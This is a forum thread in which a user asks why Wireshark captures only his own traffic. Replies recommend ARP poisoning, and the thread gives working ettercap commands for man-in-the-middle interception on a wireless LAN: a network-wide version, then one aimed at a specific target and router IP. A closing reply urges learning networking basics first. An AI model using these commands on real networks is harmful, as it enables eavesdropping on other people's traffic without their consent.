Wireshark traffic

[amithiel]

Hello guys,

I've been searching and asking around in a lot of places, trying to gather all the info i can...but i'm not yet convinced, so i decided to come here and ask your help.

Problem: Wireshark captures only my traffic, and not for the other computers in my network.

Solutions tried:

1 - At first i was using windows 7 + wireshark + winpcap. I could capture only my own packets, either in promiscuous mode or not.

2 - Following someone's advice, i burned up a copy of backtrack 4 and messed out a bit with it. Funny thing is: i could actually see the other comouter's names appearing on the log...but no http traffic at all, and i'm 100% sure they were browsing websites.

I've just been told: hey you can't capture other computers packets on your wireless, because probably your router doesn't support "port mirroring".

So i went gogling a lot about that, and actually it doesn't support, so can't monitor anything. But i didn't quit...because i find it hard to believe..i mean, is that impossible at all?
Also i heard about arp poisoning? would that help? i'm kinda confused here. I think it's just weird..i mean, i'm connected through wireless...and i can grab my http traffic, chat conversations and whatever, but not from the other computers?

If i start using ettercap, would it make a difference?
thanks in advance

[2901119]

ettercap is capable of capturing traffic from any computer on your network.

[gunrunr]

You need to arp poison the other users on your network so that they will think you're the default gateway and send you their packets. I'm guessing you are using eth0, even if you're in promiscuous mode in wireshark the only packets that you will receive will be broadcast packets because they are sent too all IP's on your subnet.

[amithiel]

I wish i could edit my last post just found something else guys.
So i used the text version of ettercap and know i can see all the traffic going on.
i went:

ettercap -T -M arp -i wlan0 // // testing.cap

And i could see it. but i have this issue, the other computer on my network could barely open any site... maybe google, but super slow and likely to fail the connection. but when he finally opens a site, i can see the traffic. at the moment only 2 computers were connected. Mine with ettercap, and i have another laptop here to do the testing. Is there any part of the command i can change, so it improoves this super lag going on?

Also, the second part of the command, would be something like this:

cat testing.cap |grep -a http

This would allow me to filter only http*, but its not working, it says the files does not exist

[cseven]

you are poisoning the entire network try:

ettercap -T -M arp -i wlan0 /target_computer_ip/ /router_ip/ testing.cap

[thorin]

Hello guys,

I've been searching and asking around in a lot of places, trying to gather all the info i can...but i'm not yet convinced, so i decided to come here and ask your help.

Problem: Wireshark captures only my traffic, and not for the other computers in my network.

Please read up on switches, hubs, and routers (maybe even span ports). Then read up on ARP and ARP Spoofing. Then you'll understand why you only see your traffic.

Solutions tried:

1 - At first i was using windows 7 + wireshark + winpcap. I could capture only my own packets, either in promiscuous mode or not.

Working as expected, no surprise here.

2 - Following someone's advice, i burned up a copy of backtrack 4 and messed out a bit with it. Funny thing is: i could actually see the other comouter's names appearing on the log...but no http traffic at all, and i'm 100% sure they were browsing websites.

Again working as expected, no surprise here.

You should probably learn how networks function before you try to test them or break them. It's like learning to crawl before trying to run. Learning to change the oil in your car before trying to do a total engine overhaul.

Without some knowledge on which to base the stuff you're doing you'll only end up wasting your time or worse breaking something that someone else has to fix or that someone else depends on (whether it's you, your family, your school or the company you work for).

Don't let this discourage you. Yes everyone has to start somewhere but some fundamental knowledge will help you a lot here.